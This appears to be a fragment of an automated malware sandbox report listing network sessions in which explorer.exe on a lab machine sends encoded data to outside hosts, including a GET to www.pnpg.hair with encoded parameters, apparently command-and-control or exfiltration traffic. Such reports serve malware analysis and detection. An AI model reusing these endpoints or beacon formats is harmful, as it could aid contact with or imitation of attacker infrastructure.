62 78 6b 72 64 39 52 46 69 49 69 54 49 53 6c 47 57 39 38 72 38 59 6a 38 33 55 62 73 6b 6b 6d 49 7e 41 66 74 32 50 43 33 53 46 76 32 4a 6a 62 79 44 34 51 61 4b 43 68 7a 31 79 51 59 5a 4f 75 50 6e 43 64 63 66 31 5a 6a 41 77 57 57 70 42 62 39 6c 31 6d 35 48 42 58 46 77 5a 39 35 73 48 4e 74 31 47 6d 63 42 6b 32 78 49 39 56 64 6a 56 4a 34 61 63 52 7a 77 51 68 54 6b 48 76 68 4c 74 71 79 4c 4c 44 50 67 66 6c 49 7e 77 48 79 6b Data Ascii: jXu=BRVbfBpwxuQVhfZWK7MIWuuJimzhZ-VT2UHj~-niuDH9pWEmC88VvmRTsSJvvNIVIRkxot8N08C45yWpKLuB6It0qHv2u4IMLeWKg1ZSuU2dcMDb0hbEMvsCswsavYjpV2rOOOL2eFGx40SzJdH9Aq4r7SDRPzxrTpXhD0Ot0OFP53jKhFTUjwNRfpzUgMqqKVFz9YCd1buTwxMKNLjyQqI9vw4bMr(8Y63pSXEo5_aRdCR6p_dWUSdP269i9Wp9viZpfjykTKWJg5Cta7uFnY81OEA9~FUFrvzlL8Ht6LOijT(R80q6xrV9MS7xeR(gJSN9Rf2guLHWy-RJCt0hEsDYwb7Y3lx0Ppy765enfGZKyC9NZzPa4M1sYuaE0lbnb3f0MxFKVSuV~QnukoUYbvvrnUz7e10M0on6S_J7t9ivnAO-DDq3Rif_4ycdkrUp(HAlcYeXvK90IAyd0B2Fs4SMEy60lrEiOSBpfrpyNp(q(TftOwxEXsbxA-tjqyAX8ZvewgulBAqJRb~vdM5pt3wsIvrFBsg_yEbCqiESTTKtAmnvineMkzvE1JFCfvckxhKu1jMcxPnzclSoiQ(Wzt5FGUcKLr(3HnuY0Qt0zGw-u9ddyl2QPlW8(-qMAIjz~rw66SKkur1kOY5xRfKeMVi_FSsGqnziT78z91V27Ak2NK3ZZ9BIMEAK4BwbrmZV6bTR7fWVoSLz1J5AZJBNaXOqzsHMKrbtMi2n01oEjtcvuABPN65NQyEoKDLrnQN0(s1V0t9YYKUe2dpYyFMUDr06UKT8k4~lnCk_ZFqlwh7eXu28nUx7f-KzyWSoVZlnm_EO9EDfZG6qLyRU4J4iz88Ko6(Lc53rIrhqpuqCosj9mTG5jCmKraPIr8DnXe1Xeh4FvVjEb65rNfEJ2yYnGL3Fh2R4MopkaM6JOWW9lB50kNJbVWvv9Tue(rw5zArH(7oCagahi89Cg8InhchB5IesI1DJtmBLU4A2tFqTOqWvuxjI(Orapr(CcUuXQmKqBTjgwk3gQrOHQ87Q6bNxdJccuHY8noVM7_OyLKRD(P7Gx_T_8L95rLn7RXIcR0t7EjvnLYPNCJbWHTz7km6mpB7As1e-IfV7~pCTW9iy5paAHTiPXUqbnuEW8UxmV0JwKJcqCjYZFmdNIhH3fq8xqoymkpo4nGdDG-kLIKX6ImakTvuLr3blvOBG0ckTrx~QsIbxkrd9RFiIiTISlGW98r8Yj83UbskkmI~Aft2PC3SFv2JjbyD4QaKChz1yQYZOuPnCdcf1ZjAwWWpBb9l1m5HBXFwZ95sHNt1GmcBk2xI9VdjVJ4acRzwQhTkHvhLtqyLLDPgflI~wHyk03Qdfm5PVPNr5u4HoUOpo5nuZEfMZzQ7qNNFtmCfYYU0bLkqEsmsiOFg2iWNjOY4VoWUv2yoGn2HbK8CpY0WOUH~-QKkdr7imWmQDkeVy2rO1o8j0Uti6xFycKCJZ28b-d00w5zXcWBCOkGlm92(R6U6MKy2VYZQoP7i3b6ACiO8EXj4Bna0LcIpaTiqaHozHFG8v9Th34w9UrRrpHV9VREc4yAr9yIOfI9ODbkUeaGi7DAFbW1cOHHKwILSfANoa~GmNuqqpu7O_xuIw8gPSxL0Yl674zxIW7CigpDv033mUt8ukh7Jl5tgHOX(ZTjLNvvj5q-vQr0N3wJceEn8UeyMFq_~pKcEG4V~niMj-EIiaV2Ex~hGijgCkhpU4q3h7apBv(imBbvXGfvU-MWlCzNTuykZxDjEKoY5QSkVQLNWtgBQDfRC7TO7Jks7luxLjiYubwpn9MrdHO1M-0ykHC3Ia3YF8be3zuEL_j5wfWqab7vn4ZmBDDDguezk9rllG1n(lxWOuk8F_KgL8n1zry0wj8BiW0W0m0m(I7uRJscQOycNZG8luAQEr1mYR6_Tx9ywqchDd5RLSluLRsv9_taPnF0DGw_J8amhF1tVagZaMSkbMKMx2pwzPIyT4QDz4ah9pjuR5n9lDRV8HJtAp7ydTCAqyLLGJdCKrMoYBF37jdoCC3D4sM6R4JSCsH8REtfUK1O47JjiuR8ouogNaUdqDc71QVB0vZca5SJCaT6Cj2M7EzLrK8xbKW4uQNSSBNUJlZdS9dxrI70XPiut9inVr~I0Fejw3mkKCryU_scUEOU1ynMD09fuure35NA6nC_Em280ylVW5PYLKCCQtgBq4ZV6bwLKMdCe6mj(juWfZ88JR1tHioNF3kaUQnoArPuVcjQStv_KpaiomHBqECwvhthAx1eFNaiwFqJ6F7KyOqnDR742HtA39gF9UCaeolivWb0cx8ExOve(oyVI5fNvqFhXYWi1iff81zRkyGvGlp_(5c8fpUyMXC5DOSAVXF9lKsAstBYxLv0PJf-8YsdfErTnJA_Rp8g(30MuTHkpNuxaaKf6EzqWzn9M9D3Qg5wt0PFarMXHrDElgEqzonIJx6TRR3gq_2nnG7Veju5itlVTNCphdRL6OBW62hxMan1PwqhRs8rlbYDFEH3wcjTjx~wU6t-eT34PMfAYVZt5dWLtbHGWFv8TYcQfqweCjK9ysi_5sszw9mmt-rDl7x_zCIYrckNQW(MTluRsNsnX4oKRMuaCraGfAuw2KoKdwP12e62a_KZyCaDuR3WtKGCm633jSMGpW0s87wMKnRXtJZfVJxrLXR6umPQCd(1iOU4EvXLDHZP4NSq(IPofGev31k9pyxy9zUiT475WGqOivwjitavBK9iHkr78-00ahn-yxDwH-6u4mKtJnjf0Ok0NjwF1-PQkWU2Ps5WV59RoL0mUDOlIupeebSJ5erfzonhNMmaRI3y~DkQ1VVM0VL-doyfOaGKy2GbjCDvaAogiVp_F1uH9epTNCnB~W7oq-cE~vaCFxakwsxKIodDU4fS5NdaAKmJ86afNOhv54AjN9hTX0KJMPbYIYcHiN0J(4BgYUFyhNZn2VA5pAsOqmHVtOgivjzXhz8kCBQ3kfthYltqAuTWSZGEGcqjSBsT8STCHQl8kmB7wnfHlcm4HhLDbTGIxt136qBS21SaSZZQT4WgZ8Q_yO8pts47hUmhHvP7Dnt9NLtQWUcJPRtZl4I7Msa_g_ykOyBci_q1zq9ZTTKqMqbVmu9dEZXOAJBSTxILq3Lxa851mGHHa_RypfuLxAk8GzIngkyS9ECTvzUdcQZLMxWBlDV9ceHNgBDe9QRK82Y0MRjDgmzzUb9pB9gxIu3qfG(n1we1uFzIkAb7LiTslyokSOepd9cFFN3zpKD1GlZkD3TVKezIfi~xrcIP~1i-3sqD(j4DtotjPrvqCEyuyZLdZxsoT57KkbVqOUXfBJoV9-xv9tn185xY9hZXC1(Jq1JUnWmNXCC2WfRd3VHsDu2UTH0uosHJqJb1cLV_5fmC(msqhmo2vj8tPVwMBT9MnJqywBhUySjdo6p-fG~I0EvWZze5Ryvtgf4h5HTQ4N(bxKzxxr9DY8zUxKKg9HJMmW(S45jctGAK0tFLTOPGiwRNRnrKBCEpTRHT0wCZQtQs3PiecunA5QN7iwE2rq2lCw038euqfRxoXGt28zjgs4YNQyF-Z3HNWveZW-huCeP39Hoc~KEBfHE7QeHI~Roe5MRE7WptdvD1gLdpz-2B6Mpib_5l0pXSsyEZrWL-Atn-3g6w0_nd9sEKku1aJoHzclgW6ivPr3Q7oquiY_gi48JzDUCvcMmxJmOvp8gRsl9u7AEukiCZRozxCcgIVD5ZMMSi(JMvpi~fIj935ZpIRuHBHbctiyCHaD84YnfrTlrvaiIvsfMmGCKNRJjzpjensmliZPPPaSW4dIHACwDTtbWexfrvkKxBhuOOLAb-ICMDLcU1p4BcqKb3GYLjpJvZkHK2cM5AcLofuPQpzSyDauVc9WJjq-T57ytRofG1kBz-StnERSZZBX6JYrtcCkkrMycTJ8fd~_fDpjTvJHVG(0o7kkn8D5KhwXcOBVT2HDMMaQ3FpPIhrQ2_ygtSEYCH3awwaYlJYWImvl~TKkH5d7mqkApvhTfXFh(mMCiRnnnwzTr_0QvvypX5Q8ElmHCukK96Efry
Oct 26, 2022 13:17:41.616158962 CEST	1025	OUT	Data Raw: 72 51 4e 55 4b 7a 6f 64 5f 28 58 35 39 7a 74 74 59 62 5f 4c 68 6d 36 4c 38 36 6b 32 6b 50 50 70 66 76 32 68 30 6b 54 6d 4f 66 32 4d 6b 6c 62 4b 30 47 6e 37 71 59 54 71 78 30 78 7a 54 44 55 36 6b 6b 2d 59 65 7e 51 79 79 76 53 6d 51 48 59 51 37 6b Data Ascii: rQNUKzod_(X59zttYb_Lhm6L86k2kPPpfv2h0kTmOf2MklbK0Gn7qYTqx0xzTDU6kk-Ye~QyyvSmQHYQ7k4mVkwpmrwwDh5JJ9ekf(ldCnEzk7qQqDizIhxukr_O3vpwWr00eGPJ2TFkXc8REr3sw35e7W3wW49B3tLMjAzpc4oX4S-niM_fkZCl-IQ6S4eb0oWSOmiv2OsNAGa8H3SNiozRpsKpbJbgxQyG1FDL4pdkgYquoz9
Oct 26, 2022 13:17:41.625072956 CEST	1027	OUT	Data Raw: 45 74 52 42 65 47 66 6e 63 6f 57 42 42 7e 56 35 63 69 56 4d 76 56 5f 54 72 47 57 56 52 4f 47 4b 54 58 5f 36 48 6e 71 76 76 79 57 43 30 50 41 42 49 6c 6c 54 75 70 59 28 6c 6d 2d 45 4f 78 4f 6c 50 68 4c 7a 2d 45 65 7a 68 6b 39 67 6a 63 44 4f 45 44 Data Ascii: EtRBeGfncoWBB~V5ciVMvV_TrGWVROGKTX_6HnqvvyWC0PABIllTupY(lm-EOxOlPhLz-Eezhk9gjcDOED-Lrz3yyiphBt9Qa7w7Rp0g8bhRQC5(wHXR0BK84OjmV(6sphUy6ltc30wmLCWftcJB2ZKisH84IJtFr1zPjRkVjgExZXNyjc3~o4S6K4kYU(JqqyYeMizwiD8BhxR0EIJIUsiVcLo7FVkXdlWMYwRfe0Ipu3Celkr
Oct 26, 2022 13:17:41.625135899 CEST	1028	OUT	Data Raw: 73 68 50 4f 34 63 4b 4d 57 61 63 28 56 58 54 79 2d 70 6d 64 54 6d 4e 51 6d 30 78 56 44 67 56 38 5f 50 72 43 36 4d 64 69 50 6a 6c 54 79 48 49 33 6f 36 32 36 6a 28 69 69 39 46 4f 41 55 46 55 55 7a 71 4d 4e 65 4c 48 7a 54 55 36 39 79 58 30 4e 79 54 Data Ascii: shPO4cKMWac(VXTy-pmdTmNQm0xVDgV8_PrC6MdiPjlTyHI3o626j(ii9FOAUFUUzqMNeLHzTU69yX0NyTMChoydfoCLgzw75sGpywQjkWQU9rkh0(lC7SPL_Z1YokZ2E6oAzJl8PEVM4xUuYosa6dGI-owPO6Sko4v8U7YYL0vT9sJwLqpchT4h0XQFmnktHqK1g1OGI(ueWdHB87Elk9lhF8ZeZj335o6ZTIE~DKfONn9Fn7f
Oct 26, 2022 13:17:41.625359058 CEST	1038	OUT	Data Raw: 4b 34 4d 31 62 6f 64 4d 58 45 65 28 4b 74 64 45 33 33 6d 42 48 4c 45 41 4d 61 55 38 48 4e 57 65 61 69 5f 43 33 43 6f 7e 61 63 39 4f 38 65 66 78 43 4f 44 31 41 55 68 77 59 28 41 45 35 37 31 63 67 77 4e 75 70 30 35 72 35 53 78 54 53 73 30 30 6e 48 Data Ascii: K4M1bodMXEe(KtdE33mBHLEAMaU8HNWeai_C3Co~ac9O8efxCOD1AUhwY(AE571cgwNup05r5SxTSs00nH9AOFf46JiotV19d4_ojp8I7nNbxOFejo4pg3dQu1DrYI1FiPP2GhzuR6srexirF0r3EecRQDaE5rcIyS44HoXvZqj7t2sS28cQ6~f8yBY3y2k7uXRKzrZBO(lhZ5KPO09E2MoPiZvx4xsJ3VdyUjwExwS8eOVa85f
Oct 26, 2022 13:17:41.625574112 CEST	1039	OUT	Data Raw: 30 66 5f 51 44 45 53 28 66 62 48 4e 73 6c 5a 31 6b 46 47 78 50 69 31 6d 35 28 7a 44 67 52 6b 54 42 62 78 41 79 79 56 7e 43 4c 5f 55 54 53 4d 51 5a 32 6e 71 66 45 38 6b 4d 42 68 28 4f 37 58 6c 50 6f 37 45 4e 33 61 44 39 63 59 4c 75 67 63 56 4f 79 Data Ascii: 0f_QDES(fbHNslZ1kFGxPi1m5(zDgRkTBbxAyyV~CL_UTSMQZ2nqfE8kMBh(O7XlPo7EN3aD9cYLugcVOyWMN87uys9GQqSaJ8rwlQQEgP1VK88VxGhrfrHXHF4(QTxOidFMjhKsBck5UdUH9JWRLqtjQ6mXu8KM054x6L1i-DRl4yx8fE2r42nUkYUKto_5mLz(yoHmngQnwJfpko6tHXarwo7CeChM5XnZD(zjDqPM72FK9su
Oct 26, 2022 13:17:41.625755072 CEST	1045	OUT	Data Raw: 30 59 4f 55 77 55 6c 51 58 63 30 64 52 36 62 37 75 6e 37 75 45 6f 32 6d 6d 36 73 4f 47 31 65 53 77 67 4c 44 72 34 54 37 74 6a 38 78 63 78 72 33 36 6b 6b 69 53 36 56 44 55 54 67 28 62 4a 57 46 71 6d 4f 75 79 75 30 6b 6c 4c 48 79 4a 33 52 63 49 56 Data Ascii: 0YOUwUlQXc0dR6b7un7uEo2mm6sOG1eSwgLDr4T7tj8xcxr36kkiS6VDUTg(bJWFqmOuyu0klLHyJ3RcIVJy-sRTtdH01ns4cKmZla4K3xrMHPN0szEptQtWRtg08~HePOqxpx9C0sqcRWsGXT_Tf7ILh6jEodFhwO3jgFccII0JSOluMr1JPgY4CwFROY1rHFZNhTsK9zQ2O4KxzuwQmuJ~2DEkFSWxf~FfAvsaqVGqT01CE2L
Oct 26, 2022 13:17:41.625792027 CEST	1046	OUT	Data Raw: 34 72 32 46 62 36 62 6b 47 33 72 55 63 4c 57 75 55 62 72 32 44 74 39 44 39 78 4a 37 57 6f 6f 78 63 72 75 5a 4e 75 7a 49 67 5a 38 57 74 4c 55 37 48 67 6e 62 5f 6b 62 50 7a 39 6f 31 51 39 77 46 4c 4a 76 4a 50 28 75 52 75 30 4d 67 76 57 79 45 56 6d Data Ascii: 4r2Fb6bkG3rUcLWuUbr2Dt9D9xJ7WooxcruZNuzIgZ8WtLU7Hgnb_kbPz9o1Q9wFLJvJP(uRu0MgvWyEVmhbkj67FIIPgJIcOnWZa56D34QHMCkOvCFgTZD3DHozmVYtRaMio6HjYT8xcRzcTd8257araUOMpv9t0tx4gtKvTC2tjwyP2t1wVRgWvYzFJ54TVyjWJZwxGcKynwCKyTp84rtnewyLth8gYKSfHSujI0le6ZIRGNT
Oct 26, 2022 13:17:41.626190901 CEST	1050	OUT	Data Raw: 79 54 2d 4c 36 71 42 42 6b 75 53 34 4c 48 71 77 45 64 37 45 43 7e 47 5a 54 6c 63 4b 49 64 7a 57 77 52 4c 68 74 55 44 43 37 35 41 71 79 62 6c 4b 64 32 55 6e 46 4d 44 35 76 44 50 4e 41 4f 56 66 32 48 64 7e 75 51 54 6e 6c 73 50 36 59 52 57 72 58 4d Data Ascii: yT-L6qBBkuS4LHqwEd7EC~GZTlcKIdzWwRLhtUDC75AqyblKd2UnFMD5vDPNAOVf2Hd~uQTnlsP6YRWrXM6kVTDVWija2X9iXdT(WcDaxkDddDlsoa8VGijRU4rGCoo4PYJoviNCa477P1wp-yyVW69mK~5A48klU2gJNZls70h4kauYMhAsYmSk2vG6vlkyaqqvz26wNfaquadiUzdwBuXjjBmZYX0KWRkqppsIflgPEvK51y8
Oct 26, 2022 13:17:41.634109974 CEST	1051	OUT	Data Raw: 65 6e 4e 28 4d 41 6e 61 4d 44 55 69 75 31 4a 6b 57 62 34 58 37 69 6a 76 5a 28 47 6a 56 6e 66 58 5a 46 46 62 5f 28 2d 55 63 4b 52 49 56 65 61 78 32 54 47 64 63 37 6c 4e 69 73 69 69 32 59 46 76 79 57 65 42 4a 41 72 4b 38 75 57 4a 65 72 45 55 6b 58 Data Ascii: enN(MAnaMDUiu1JkWb4X7ijvZ(GjVnfXZFFb_(-UcKRIVeax2TGdc7lNisii2YFvyWeBJArK8uWJerEUkXn22kxg3UhXF5NCt1jmTs2wIhibWKGV5wV4zQ3V9QLfawImY8FM0J9hWHu2lFYYKWTaYhSWCj7jzxWbhYL1ZJAEkcA3LyvMB6Pcne-(98FOarxJDIPYBMNSI0XQl9fWQoA2JwCqcZKL2hlQ-MBI39rwZRdmP8RkWXI
Oct 26, 2022 13:17:41.634180069 CEST	1053	OUT	Data Raw: 49 51 75 6f 38 70 79 39 44 42 49 76 5f 4a 6b 58 6f 34 77 54 66 73 63 73 57 51 52 77 33 32 32 6f 51 70 68 6e 4b 41 4e 73 72 42 61 57 61 33 50 51 6a 42 39 49 77 49 6d 57 74 30 35 64 79 78 67 75 4b 52 78 37 33 38 77 5a 57 30 4e 62 52 32 63 39 44 67 Data Ascii: IQuo8py9DBIv_JkXo4wTfscsWQRw322oQphnKANsrBaWa3PQjB9IwImWt05dyxguKRx738wZW0NbR2c9Dg7GnGTaPv2URq4xU22wvnYFGBqRLqttrhZKlMVTvp004q9y-icT_3DUD5QND6u~a8dmS4qSYWrXpmLmK0ooWveTq4Vl5KMqNcthEE9x19bLXdPMM5A2Pm4IrDmWRx0TiOsUBNVCFD4fUWU(59OkeftDtgOqk2ZIhkn
Oct 26, 2022 13:17:41.918575048 CEST	1067	IN	HTTP/1.1 200 OK Date: Wed, 26 Oct 2022 11:17:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.2.24 Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0 Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6dhNq75Ksgqo0PBH1OHoGQz1p90gU0LC7NCtd7FnByYgBZvX%2F6LjryxaxpcJc07%2FHbrX14xnKhhl8qoY8g18ercErXZa6Dh93dIaQUafyH9HjZW94xqlJZeqOn4D4RL8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7602c9771f8f9b7a-FRA Content-Encoding: gzip alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 36 30 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a4 58 5b 8f eb b6 11 7e 3f c0 f9 0f ac 83 26 7b 8a 91 2c f9 7e 64 7b 9b a2 49 d0 3e b5 68 fb d2 a7 80 12 47 12 b3 bc 2d 49 f9 d2 c5 fe f7 80 b2 94 63 af b5 de 3d a9 0d 98 12 39 1c ce 7c f3 cd 90 f4 c7 0f 9b 3f fc f0 8f bf fe e7 bf ff fc 91 d4 5e 8a fb 8f 1f 36 5d 1b 9e 90 b2 fb 8f 1f 08 21 64 e3 b9 17 78 bf df ef 63 a3 4c 15 d7 94 5b c2 1d a1 a4 68 9c d7 92 b8 5a 5b 4f 98 96 94 ab cd f8 24 dd 4d 95 e8 29 51 54 e2 76 b4 e3 b8 37 da fa 11 29 b4 f2 a8 fc 76 b4 e7 cc d7 5b 86 3b 5e 60 d4 be 00 e1 8a 7b 4e 45 e4 0a 2a 70 9b 8e c8 b8 d7 25 b8 7a 20 16 c5 76 64 2c 16 5a 29 2c fc 88 d4 16 cb ed a8 f6 de b8 6c 3c 2e b5 f2 2e ae 9c a7 9e 17 71 a1 e5 e8 62 f6 a0 b0 d6 95 40 6a b8 0b f2 e3 c2 b9 c9 9f 4b 2a b9 38 6e ff c6 15 cb f6 55 ed bf 9f 25 c9 7a 9e 24 df 32 ee 8c a0 c7 ad db 53 33 3a 19 e3 fc 51 a0 ab 11 fd 6f 6b b5 5d c4 1f 0d 6e 47 1e 0f 3e 28 ed 07 fb 4f 80 1a 72 cd 8e c0 f8 0e 9c a1 0a a8 31 02 3d e8 fc 17 2c 3c f0 d2 52 89 50 a7 50 4f a0 9e 42 3d 83 7a 0e f5 02 0c e4 42 17 0f 8f 8d f6 08 c6 22 50 a0 79 6e 81 16 56 ab a3 04 ca 98 45 e7 20 e7 15 14 dc 23 14 9a 21 30 14 c0 4a 05 28 81 cb 0a b8 72 f0 90 33 78 04 07 8e 4a 03 4e 52 21 c0 79 cb 1f 30 34 5a 55 e0 9a 1c 5c 63 c0 7b d8 51 0b 39 34 c0 a1 40 e5 d1 02 13 c0 3c 30 06 5a 40 23 40 70 28 39 0a e6 d0 43 a9 ad 04 41 73 14 20 b0 42 c5 c0 d3 5c 20 14 d4 78 ae 15 f8 d6 6d 5f 6a ed c1 07 a2 81 b7 e0 6b f0 0c a8 f5 bc 10 08 d4 71 16 26 a8 1d 75 c0 d0 53 2e 1c a0 cc 91 41 c9 ab c6 62 68 7a 7d 41 11 5a 08 9a 42 53 59 dd 18 90 a8 1a 50 74 07 ba f1 a6 f1 60 9b fc 08 0e 8b 76 86 6b a4 a4 f6 08 9e 4b 04 49 Data Ascii: 606X[~?&{,~d{I>hG-Ic=9\|?^6]!dxcL[hZ[O$M)QTv7)v[;^`{NEp%z vd,Z),l<..qb@jK8nU%z$2S3:Qok]nG>(Or1=,<RPPOB=zB"PynVE #!0J(r3xJNR!y04ZU\c{Q94@<0Z@#@p(9CAs B\ xm_jkq&uS.Abhz}AZBSYPt`vkKI
Oct 26, 2022 13:17:41.918663025 CEST	1068	IN	Data Raw: ed 03 d0 86 71 0d 3b ce 50 3f 49 6a 2b ae b2 64 6d 28 63 5c 55 59 b2 ce b5 65 68 b3 64 1d 38 13 39 fe 3f cc d2 24 f9 63 fb 9a 71 55 a3 e5 7e bd c3 60 3d 15 11 15 bc 52 59 4e 1d 0a ae f0 f9 d2 a9 de 9b 73 07 3a 97 6e fa d1 d9 fe d4 51 30 6b 49 f0 Data Ascii: q;P?Ij+dm(c\UYehd89?$cqU~`=RYNs:nQ0kI\|D5YIp8@c-+ey<u<u}luq~:ZjfCb-ZX/RO2E!>4fj@GYR*]:1 i~^~Nw{ >Z;c`(bXF<
Oct 26, 2022 13:17:41.918706894 CEST	1068	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
41	192.168.11.20	49885	188.114.96.3	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:17:43.646823883 CEST	1069	OUT	GET /d0ad/?-ZeDxH=1bfDxheXLTWtxB0&jXu=MT97c0J759A0sOsOXYgXf7Xc72zTUNBA1GaWpb3y0T3bjGcERslrwlwnjRFvocEHJT8Z6PNgwaS4sx6KFIijle8Vsk6Ju/84EQ== HTTP/1.1 Host: www.pnpg.hair Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 26, 2022 13:17:43.935406923 CEST	1070	IN	HTTP/1.1 200 OK Date: Wed, 26 Oct 2022 11:17:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.2.24 Cache-Control: no-store, no-cache, must-revalidate, max-age=0, post-check=0, pre-check=0 Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=W9IVUwHJeFYBKO6CjrlzQ7mG1J1kwSaUJjyodbnRXxvCenXCyzAqa9ZOcWAsauH1O%2Bf5dV7j0ZPgVcciQtk32WzRZPgb7L5JgvdHojG2bsGWSLX6%2F8zIh0U%2Fh3NtXeZv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7602c983d9698fd6-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 31 31 30 39 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 70 6e 70 67 2e 68 61 69 72 20 69 73 20 61 20 63 75 73 74 6f 6d 20 73 68 6f 72 74 20 64 6f 6d 61 69 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 69 6e 64 3a 77 67 68 74 40 34 30 30 3b 35 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 64 69 76 2c 73 70 61 6e 2c 61 70 70 6c 65 74 2c 6f 62 6a 65 63 74 2c 69 66 72 61 6d 65 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 2c 70 2c 62 6c 6f 63 6b 71 75 6f 74 65 2c 70 72 65 2c 61 2c 61 62 62 72 2c 61 63 72 6f 6e 79 6d 2c 61 64 64 72 65 73 73 2c 62 69 67 2c 63 69 74 65 2c 63 6f 64 65 2c 64 65 6c 2c 64 66 6e 2c 65 6d 2c 69 6d 67 2c 69 6e 73 2c 6b 62 64 2c 71 2c 73 2c 73 61 6d 70 2c 73 6d 61 6c 6c 2c 73 74 72 69 6b 65 2c 73 74 72 6f 6e 67 2c 73 75 62 2c 73 75 70 Data Ascii: 1109<!DOCTYPE html><html><head> <title>www.pnpg.hair is a custom short domain</title> <meta name="viewport" content="width=device-width, initial-scale=1" /> <link rel="preconnect" href="https://fonts.gstatic.com"> <link href="https://fonts.googleapis.com/css2?family=Hind:wght@400;500&display=swap" rel="stylesheet"> <style type="text/css"> html,body,div,span,applet,object,iframe,h1,h2,h3,h4,h5,h6,p,blockquote,pre,a,abbr,acronym,address,big,cite,code,del,dfn,em,img,ins,kbd,q,s,samp,small,strike,strong,sub,sup
Oct 26, 2022 13:17:43.935532093 CEST	1071	IN	Data Raw: 2c 74 74 2c 76 61 72 2c 62 2c 75 2c 69 2c 63 65 6e 74 65 72 2c 64 6c 2c 64 74 2c 64 64 2c 6f 6c 2c 75 6c 2c 6c 69 2c 66 69 65 6c 64 73 65 74 2c 66 6f 72 6d 2c 6c 61 62 65 6c 2c 6c 65 67 65 6e 64 2c 74 61 62 6c 65 2c 63 61 70 74 69 6f 6e 2c 74 62 Data Ascii: ,tt,var,b,u,i,center,dl,dt,dd,ol,ul,li,fieldset,form,label,legend,table,caption,tbody,tfoot,thead,tr,th,td,article,aside,canvas,details,embed,figure,figcaption,footer,header,hgroup,menu,nav,output,ruby,section,summary,time,mark,audio,video{mar
Oct 26, 2022 13:17:43.935626030 CEST	1073	IN	Data Raw: 20 35 35 2c 20 35 36 2c 20 30 2e 37 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 35 31 2c 35 31 2c 36 31 Data Ascii: 55, 56, 0.7); } h1 { color: rgba(51,51,61,1); font-weight: 600; font-size: 2rem; line-height: 2.47rem; text-align: center; }
Oct 26, 2022 13:17:43.935715914 CEST	1074	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 38 33 37 33 38 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: background-color: #383738; color: #fff; padding: 1.3541vmax 3.0208vmax; text-decoration: none; display: flex; align-items: center; just
Oct 26, 2022 13:17:43.935775995 CEST	1074	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
42	192.168.11.20	49886	74.208.236.144	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
